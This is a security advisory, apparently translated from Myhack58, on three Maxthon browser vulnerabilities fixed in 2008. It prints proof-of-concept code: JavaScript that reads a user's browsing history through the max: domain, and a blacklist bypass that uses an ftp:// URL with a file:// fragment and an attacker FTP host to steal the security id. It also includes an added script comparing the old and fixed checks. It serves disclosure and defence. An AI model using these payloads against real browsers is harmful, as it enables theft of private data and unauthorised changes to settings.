Maxthon fixes several security vulnerabilities - Vulnerability Warning - Myhack58 (黑吧安全网)

2008-07-02T00:00:00
ID MYHACK58:62200819553
Type myhack58
Reporter Anonymous (佚名)
Modified 2008-07-02T00:00:00

Description

After 80sec notified Maxthon of the security vulnerabilities, Maxthon released a new browser version on 6.30 (June 30) that fixes the previously reported vulnerabilities. The update details can be found at http://blog.maxthon.cn/. The update fixes three security issues; the main details of each are as follows:

Vulnerability sources: http://www.80sec.com/release/maxthon-vulns-poc.txt

1. Browser kernel vulnerability leads to a local cross-domain vulnerability

Vulnerability description: Maxthon uses the system's IE kernel, but that kernel may contain security vulnerabilities that allow cross-domain attacks. Maxthon's max: domain is locally equivalent to file://, so such a cross-domain attack results in JavaScript executing in the local context. Only a POC that reads Maxthon's browsing history is given here.

Vulnerability POC:

<a href="">Maxthon Exploit</a>
<script>
function win(){
  x=window.open("max:history");
  setTimeout(function(){
    x.location=new String("javascript:x=maxHistory.history.list.site.loadData();for(i=0;i<x.length;i++) document.write(x[i].site+\"<br>\");")
  },3000)
}
window.onload=function(){
  for (i=0;i<document.links.length;i++) {
    document.links[i].href="javascript:win()"
  }
}
</script>

Vulnerability fix: the new Maxthon version already fixes this security vulnerability, ahead of any fix in the IE kernel itself.

2. Maxthon Security Center vulnerability leads to remote modification of arbitrary user settings

Vulnerability description: Maxthon does not fully account for some characteristics of the IE kernel, so a security vulnerability arises when certain special situations are handled. Maxthon's control center is actually a set of HTML + JavaScript pages; through these pages one can read sensitive data, modify browser settings, download files, and so on. Of course, Maxthon has its own security policy that prevents these HTML files from being called directly by an external site: a security control policy lives in security.src, whose code is as follows:

var max_security_id="";
var url=String(document.location).toLowerCase();
if(url.indexOf('file://')>-1&&url.indexOf('http://')==-1&&url.indexOf('https://')==-1){
  max_security_id='{B73B3AC9-B009-4429-AE67-514332D791FE}';
}else{
  document.location='about:blank';
}

Here max_security_id is a parameter that must be passed whenever Maxthon calls any of its controls; it is required by every function, and it differs on every machine. If we can obtain this max_security_id, then any remote site can call Maxthon's various functions, such as changing settings, reading sensitive data, or even remote code execution.

First, this max_security_id appears to change on every startup; it is stored in template/security.src under the installation directory, and we can make the following call from our own web page:

<script src="E:\Program Files\Maxthon2\template\security.src"></script>
<script src="d:\Program Files\Maxthon2\template\security.src"></script>
<script src="c:\Program Files\Maxthon2\template\security.src"></script>

Surprisingly, Maxthon allows local files to be referenced this way. But security.src is also restricted: it only assigns the value when the location contains file:// and contains neither http:// nor https://; otherwise it redirects to about:blank. Maxthon's mistake here is that this is a blacklist policy, so it can be bypassed with other protocols such as ftp://, and making the location contain file:// is also very simple:

ftp://www.foo.com/exploit.html#file://80sec.com

Such an address actually loads exploit.html, but the location contains file://, so the security policy is bypassed and max_security_id can be obtained; with the acquired max_security_id, any operation can then be performed.

Vulnerability POC:

Set up an anonymous FTP server www.foo.com, and then on a malicious site include the following reference:

<iframe src="ftp://www.foo.com/history/index.htm#file:///www.80sec.com" width=100% height=100%>

/history/index.htm on www.foo.com holds a carefully constructed malicious page. The easiest way to build it is to take index.html from the history (or another) subdirectory of the official installation's template directory and replace

<script type="text/javascript" src="../security.src"></script>

with

<script src="E:\Program Files\Maxthon2\template\security.src"></script>
<script src="d:\Program Files\Maxthon2\template\security.src"></script>
<script src="c:\Program Files\Maxthon2\template\security.src"></script>

By modifying the contents of index.htm, browser settings can be modified, history read, and so on.

Vulnerability fix: in the new version the code has been amended to

var max_security_id="";
if(String(window.document.location).toLowerCase().indexOf('file://')==0){
  max_security_id='{02E14D94-53C8-4B6D-89AE-755DC5299C6C}';
}else{
  document.location='about:blank';
}

Restricting this script so that only local files can reference it fixes the problem.
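The following is an added example, not code from 80sec or Maxthon. It reimplements the original blacklist check from security.src and the fixed prefix check side by side, adds a third variant that decides on the parsed URL scheme (an assumption: WHATWG URL parsing as available in Node.js and modern browsers), and runs all three over constructed sample locations, including the ftp:// fragment shape the advisory describes, to show exactly which inputs the blacklist wrongly accepts and the fix rejects.

```javascript
// Added example (not Maxthon's code): compare the original blacklist check in
// security.src with the fixed prefix check, over constructed sample locations.

// Original check, as the advisory describes it: assign the id when the
// lowercased location *contains* "file://" and contains neither "http://"
// nor "https://". A blacklist: every scheme not listed is implicitly trusted.
function oldPolicyAllows(location) {
  const url = String(location).toLowerCase();
  return url.indexOf('file://') > -1 &&
         url.indexOf('http://') === -1 &&
         url.indexOf('https://') === -1;
}

// Fixed check from the new version: the lowercased location must *start with*
// "file://", i.e. an allow-list on the scheme prefix.
function newPolicyAllows(location) {
  return String(location).toLowerCase().indexOf('file://') === 0;
}

// Stricter variant (assumption: WHATWG URL parsing is available): decide on the
// parsed scheme, so fragments, query strings and userinfo cannot influence it.
function parsedPolicyAllows(location) {
  try {
    return new URL(String(location)).protocol === 'file:';
  } catch (e) {
    return false; // unparseable location: deny
  }
}

// Constructed sample locations. The ftp:// entry is the bypass shape from the
// advisory: a remote page whose fragment merely mentions file://.
const SAMPLES = [
  'file:///C:/Program Files/Maxthon2/template/history/index.htm',
  'ftp://www.foo.com/exploit.html#file://80sec.com',
  'http://www.example.com/page.html#file://x',
  'FILE:///c:/local/page.htm',
  'about:blank',
];

// Evaluate every sample under all three policies; returns one record per
// location so the results can be inspected or asserted on.
function evaluatePolicies(samples = SAMPLES) {
  return samples.map((location) => ({
    location,
    old: oldPolicyAllows(location),
    new: newPolicyAllows(location),
    parsed: parsedPolicyAllows(location),
  }));
}

// Locations the blacklist accepts but the prefix allow-list rejects: these are
// exactly the bypasses the fix closes.
function bypassesClosedByFix(samples = SAMPLES) {
  return evaluatePolicies(samples)
    .filter((r) => r.old && !r.new)
    .map((r) => r.location);
}

for (const r of evaluatePolicies()) {
  console.log(`${r.location}\n  blacklist: ${r.old}  prefix: ${r.new}  parsed: ${r.parsed}`);
}
```

The two local file:// samples pass all three checks, the http:// sample fails all three, and only the ftp:// sample separates them: the blacklist accepts it because "file://" occurs somewhere in the string, while both the prefix check and the parsed-scheme check reject it. The general lesson is the one the fix applies: gate privileged code on an allow-list of the scheme at the start of the location (or, better, on the parsed scheme), never on the absence of known-bad substrings.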

3. RSS feed cross-site scripting vulnerability

Vulnerability description: there is a problem in Maxthon's implementation of the RSS feature, so that visiting a problematic page triggers an XSS vulnerability.

Vulnerability POC: subscribe to http://www.80sec.com/feed to see the effect :)

Vulnerability fix: fixed in the new version.

Maxthon's handling of these vulnerabilities has been very rigorous; Maxthon users are urged to upgrade to the new version as soon as possible.